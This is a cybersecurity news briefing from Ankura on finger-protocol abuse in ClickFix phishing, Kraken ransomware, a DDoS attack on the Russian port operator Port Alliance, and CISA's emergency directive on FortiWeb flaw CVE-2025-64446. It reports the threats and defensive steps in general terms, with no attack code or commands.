Malware Activity
The Return of the Finger Command and Kraken Ransomware
Hackers are now reusing the old "finger" command, once used to look up user info on Unix, Linux, and Windows systems, to deliver malicious software remotely. Through phishing campaigns called ClickFix, attackers trick users into running commands that download malware like remote access tools or malicious scripts, often disguising them as PDFs or legitimate prompts. Experts warn that this method can bypass traditional security defenses, so blocking outgoing traffic on TCP port 79 (used by the finger protocol) is recommended. Separately, Kraken ransomware has become a highly dangerous threat targeting Windows and Linux systems, testing machines for quick encryption to cause maximum damage while avoiding detection. It exploits vulnerabilities to access networks, steals data, and then encrypts critical files, demanding ransoms sometimes as high as $1 million. Kraken also deletes logs and uses secret forums to coordinate, making it a sophisticated and adaptable tool for cyber extortion across many countries. CTIX analysts will continue to report on the latest malware strains and attack methodologies.
- BleepingComputer: Decades Old Finger Protocol Abused In ClickFix Malware Attacks article
- BleepingComputer: Kraken Ransomware Benchmarks Systems For Optimal Encryption Choice article
Threat Actor Activity
Russian Port Operator Hit with Three Day DDoS Attack and Intrusion Attempts
Russian port operator Port Alliance experienced three (3) days of disruptions due to a cyberattack from abroad targeting its digital infrastructure. This incident is part of a series of cyberattacks affecting critical facilities amid the ongoing conflict between Russia and Ukraine. The attackers launched a distributed denial-of-service (DDoS) assault and attempted network breaches, aiming to destabilize operations and disrupt business processes related to exports of coal and mineral fertilizers through seaports in the Baltic, Azov–Black Sea, Far Eastern, and Arctic regions. Despite the intensity of the attack, Port Alliance reported that its terminals and facilities continued to operate normally, with all key systems remaining functional. The attackers utilized a botnet of over 15,000 unique IP addresses from around the world, including Russia, and adapted tactics to evade defenses. The company operates six (6) maritime terminals with an annual cargo turnover exceeding 50 million tons. A specific hacker group has not been attributed to the attack at this time. Cyberattacks on transport and logistics networks have increased since Russia's invasion of Ukraine in 2022. Similar attacks have been reported in Ukraine and allied nations, including a recent DDoS attack on Danish government websites, allegedly by the pro-Russian group NoName057.
Vulnerabilities
CISA Orders Emergency Patching of Actively Exploited FortiWeb Vulnerability
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive giving Federal Civilian Executive Branch (FCEB) agencies only seven (7) days to patch a critical vulnerability in Fortinet’s FortiWeb web application firewall that is under active exploitation worldwide. The flaw, tracked as CVE-2025-64446 (CVSS 9.1/10) combines a path traversal and authentication bypass, allowing unauthenticated attackers to execute administrative commands and create new administrator accounts for persistent access. Affecting FortiWeb versions 7.0.0 through 8.0.1, the issue was quietly resolved in versions 7.0.12, 7.2.12, 7.4.10, 7.6.5, and 8.0.2, though Fortinet did not disclose the fix in release notes. Researchers from Defused, watchTowr, Rapid7, and PwnDefend reported global, indiscriminate exploitation since early October, with exploit code and a zero-day allegedly offered for sale on dark web forums. Rapid7 and Tenable observed hundreds of vulnerable U.S. systems exposed on Shodan. Following reports of widespread compromise, CISA added the bug to its Known Exploited Vulnerabilities catalog, mandating rapid patching or disabling of HTTP/HTTPS interfaces until updates are applied. Fortinet has confirmed exploitation but declined to specify when it learned of the issue, urging customers to upgrade immediately and review logs for unauthorized administrative accounts, as this marks the 21st Fortinet flaw on CISA’s exploited vulnerabilities list.
📧 Never Miss a Briefing
Stay informed and secure. Subscribe to Ankura's Cyber Flash Update, a bi-weekly briefing curated by our top cybersecurity experts. Receive timely insights on emerging threats, vulnerabilities and malicious actors to keep your systems secure.
Join the Cyber Flash Update community today.
© Copyright 2025. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.
